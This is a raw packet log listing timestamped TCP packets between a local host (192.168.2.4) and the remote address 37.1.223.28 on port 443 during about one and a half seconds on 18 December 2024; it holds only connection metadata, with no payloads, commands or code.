Dec 18, 2024 23:06:11.281028032 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.281086922 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.291004896 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.291037083 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.291073084 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.291104078 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.291125059 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.291217089 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.322201014 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.322222948 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.322304964 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.322367907 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.322439909 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.419677019 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.419692993 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.419768095 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.419794083 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.419830084 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.419883966 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.425918102 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.425931931 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.425992966 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.426007986 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.426059008 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.432295084 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.432308912 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.432400942 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.432406902 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.432446957 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.439085960 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.439100027 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.439162016 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.439176083 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.439230919 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.445833921 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.445847034 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.445905924 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.445919991 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.446069002 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.452156067 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.452169895 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.452215910 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.452265978 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.452276945 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.452487946 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.457967997 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.457982063 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.458043098 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.458055973 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.458107948 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.517211914 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.517229080 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.517309904 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.517338991 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.517390966 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.623189926 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.623209953 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.623296976 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.623332024 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.623393059 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.629472017 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.629487991 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.629576921 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.629590034 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.629647970 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.636032104 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.636045933 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.636118889 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.636127949 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.636171103 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.641839981 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.641860962 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.641915083 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.641927958 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.641988039 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.648659945 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.648674965 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.648735046 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.648747921 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.648802996 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.654938936 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.654953003 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.655013084 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.655019999 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.655064106 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.661791086 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.661803961 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.661858082 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.661876917 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.661900997 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.661958933 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.727509975 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.727524996 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.727605104 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.727623940 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.727682114 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.815097094 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.815113068 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.815212011 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.815247059 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.815329075 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.821954012 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.821969032 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.822026014 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.822051048 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.822078943 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.823621035 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.827801943 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.827816963 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.827893019 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.827908993 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.827960968 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.835076094 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.835089922 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.835156918 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.835172892 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.835223913 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.841336966 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.841351032 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.841432095 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.841445923 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.841504097 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.847646952 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.847661972 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.847739935 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.847757101 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.847815037 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.854420900 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.854435921 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.854500055 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.854552031 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.854563951 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.855629921 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.920411110 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.920437098 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.920511961 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.920536041 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.920591116 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.017513037 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.017529011 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.017616987 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.017627001 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.017672062 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.023808956 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.023823023 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.023891926 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.023906946 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.023962021 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.030160904 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.030177116 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.030242920 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.030256987 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.030311108 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.036907911 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.036922932 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.036988974 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.037019968 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.037076950 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.043678999 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.043694019 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.043768883 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.043782949 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.043836117 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.049971104 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.049985886 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.050049067 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.050055981 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.050096035 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.055777073 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.055792093 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.055845976 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.055854082 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.055872917 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.055897951 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.112106085 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.112123013 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.112220049 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.112250090 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.112310886 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.209554911 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.209577084 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.209696054 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.209758043 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.209822893 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.216659069 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.216687918 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.216753960 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.216798067 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.216861963 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.222690105 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.222717047 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.222776890 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.222816944 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.222847939 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.222872972 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.229070902 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.229119062 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.229149103 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.229161024 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.229176998 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.229204893 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.235833883 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.235882044 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.235932112 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.235948086 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.235977888 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.235995054 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.242181063 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.242224932 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.242278099 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.242288113 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.242320061 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.242332935 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.248970985 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.249015093 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.249078035 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.249089003 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.249121904 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.249151945 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.303989887 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.304054022 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.304234982 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.304261923 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.304320097 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.401875019 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.401922941 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.401967049 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.401994944 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.402024984 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.402045012 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.408565044 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.408615112 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.408667088 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.408683062 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.408736944 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.408736944 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.414874077 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.414915085 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.414967060 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.414980888 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.415010929 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.415029049 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.421140909 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.421183109 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.421246052 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.421266079 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.421293974 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.421315908 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.427947044 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.427989960 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.428047895 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.428061962 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.428088903 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.428117990 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.434247971 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.434290886 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.434357882 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.434376955 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.434403896 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.434426069 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.441054106 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.441095114 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.441148043 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.441163063 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.441194057 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.441217899 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.496032953 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.496078014 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.496134996 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.496167898 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.496192932 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.496212959 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.593471050 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.593518972 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.593568087 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.593589067 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.593617916 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.593643904 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.600797892 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.600858927 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.600884914 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.600897074 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.600924015 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.600939989 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.607024908 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.607067108 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.607110977 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.607125044 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.607157946 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.607183933 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.613770008 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.613794088 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.613878965 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.613895893 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.613953114 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.619587898 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.619609118 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.619658947 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.619673014 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.619702101 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.619721889 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.625885010 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.625906944 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.625981092 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.625998020 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.626050949 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.632688999 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.632713079 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.632796049 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.632811069 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.632863998 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.688205004 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.688226938 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.688309908 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.688329935 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.688378096 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.786273956 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.786309958 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.786365032 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.786413908 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.786446095 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.786465883 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.792579889 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.792604923 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.792651892 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.792670965 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.792697906 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.792718887 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.798933983 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.798964024 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.799043894 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.799062967 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.799112082 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.805675030 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.805699110 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.805749893 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.805767059 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.805795908 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.805814981 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.811522961 CET	443	49732	37.1.223.28	192.168.2.4
